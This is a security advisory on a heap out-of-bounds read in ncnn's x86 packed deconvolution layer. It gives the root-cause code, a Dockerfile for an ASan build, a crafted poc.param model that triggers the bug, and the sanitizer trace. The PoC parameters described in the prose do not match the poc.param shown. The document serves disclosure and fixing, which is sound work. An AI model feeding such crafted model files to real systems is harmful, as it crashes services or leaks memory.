Heap Out-of-Bounds Read in Packed Deconvolution
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/deconvolution_packed.h:2355 in deconvolution_packed
Sanitizer verdict: heap-buffer-overflow
Summary
Deconvolution_x86 derives the number of input channels solely from the .param file's weight_data_size, then transforms the weights into a buffer sized for that number. The forward pass, however, iterates over the runtime tensor's channel count, so a model that declares one weight but feeds a 32-channel tensor makes the AVX-512 packed kernel load 64 bytes past the transformed weight allocation, aborting ncnnoptimize. The entry point is ncnnoptimize <param> <bin> ..., which calls create_pipeline() at load time and forward() from ModelWriter::shape_inference().
Detail
Deconvolution_x86::create_pipeline() reconstructs num_input by division, so it is a function of the attacker's declared weight count rather than of the graph. deconvolution_transform_kernel_packed() then allocates the packed weight buffer from that same figure. Nothing revisits the decision when the real input tensor arrives.
// src/layer/x86/deconvolution_x86.cpp:56
int num_input = weight_data_size / maxk / num_output;
// src/layer/x86/deconvolution_packed.h:133
else
weight_data_tm.create(maxk, num_input, num_output);
// src/layer/x86/deconvolution_packed.h:2296
const int elempack = bottom_blob.elempack;
const int inch = bottom_blob.c * elempack;
// src/layer/x86/deconvolution_packed.h:2331
for (; q + 15 < inch; q += 16)
{
// src/layer/x86/deconvolution_packed.h:2350
const float* kptr0 = kptr + k * 16;
if (elempack == 16)
{
const float* sptr = bottom_blob.channel(q / 16).row(sy) + sx * 16;
_sum_avx512 = _mm512_fmadd_ps(_mm512_load_ps(sptr), _mm512_load_ps(kptr0), _sum_avx512);
The PoC declares Deconvolution deconv 0=1 1=1 3=1 5=0 6=1 — num_output = 1, kernel_w = 1, weight_data_size = 1 — so maxk = 1 and num_input = 1 / 1 / 1 = 1. weight_data_tm.create(1, 1, 1) yields the 84-byte region ASan names (16 bytes of padded payload plus the refcount and the 64-byte NCNN_MALLOC_OVERREAD).
The Input data 0=1 1=1 2=32 blob is repacked to elempack = 16 over two channels, so inch = 2 * 16 = 32 and the q + 15 < inch loop runs twice. Each iteration ends with kptr += maxk * 16, so the second pass loads _mm512_load_ps(kptr0) from byte 64 of a buffer holding one real float; the 64-byte load runs to byte 128 and the first out-of-bounds byte is at offset 84 — exactly the address ASan flags as 0 bytes after 84-byte region. The packed kernel never compares inch against the num_input that weight_data_tm was built for.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-packed-deconvolution && cd ncnn-poc-heap-out-of-bounds-read-in-packed-deconvolution
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=32
Deconvolution deconv 1 1 data out 0=1 1=1 6=1 31=32
EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000314 at pc 0x63c6af3a82b5 bp 0x7ffd862225b0 sp 0x7ffd86222590
READ of size 64 at 0x50e000000314 thread T0
#0 0x63c6af3a82b4 in _mm512_load_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431
#1 0x63c6af3a82b4 in deconvolution_packed /ncnn/src/layer/x86/deconvolution_packed.h:2355
#2 0x63c6af48e6ff in ncnn::Deconvolution_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:408
#3 0x63c6acd5cf2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
#4 0x63c6acd4eb53 in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:163
#5 0x63c6acdae9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#6 0x63c6acc403c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#7 0x63c6accbdeee in main /ncnn/tools/ncnnoptimize.cpp:2844
#8 0x74bc5e3cf1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x74bc5e3cf28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#10 0x63c6acc3d624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x50e000000314 is located 0 bytes after 84-byte region [0x50e0000002c0,0x50e000000314)
allocated by thread T0 here:
#0 0x74bc5ea48f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x63c6acd0e92d in fastMalloc /ncnn/src/allocator.h:62
#2 0x63c6acd0e92d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x63c6af30bf6d in deconvolution_transform_kernel_packed /ncnn/src/layer/x86/deconvolution_packed.h:134
#4 0x63c6af48350a in ncnn::Deconvolution_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/deconvolution_x86_avx512.cpp:128
#5 0x63c6acda9c96 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#6 0x63c6accbdc34 in main /ncnn/tools/ncnnoptimize.cpp:2793
#7 0x74bc5e3cf1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x74bc5e3cf28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x63c6acc3d624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:431 in _mm512_load_ps(void const*)
Credit
Zheng Yu @ DepthFirst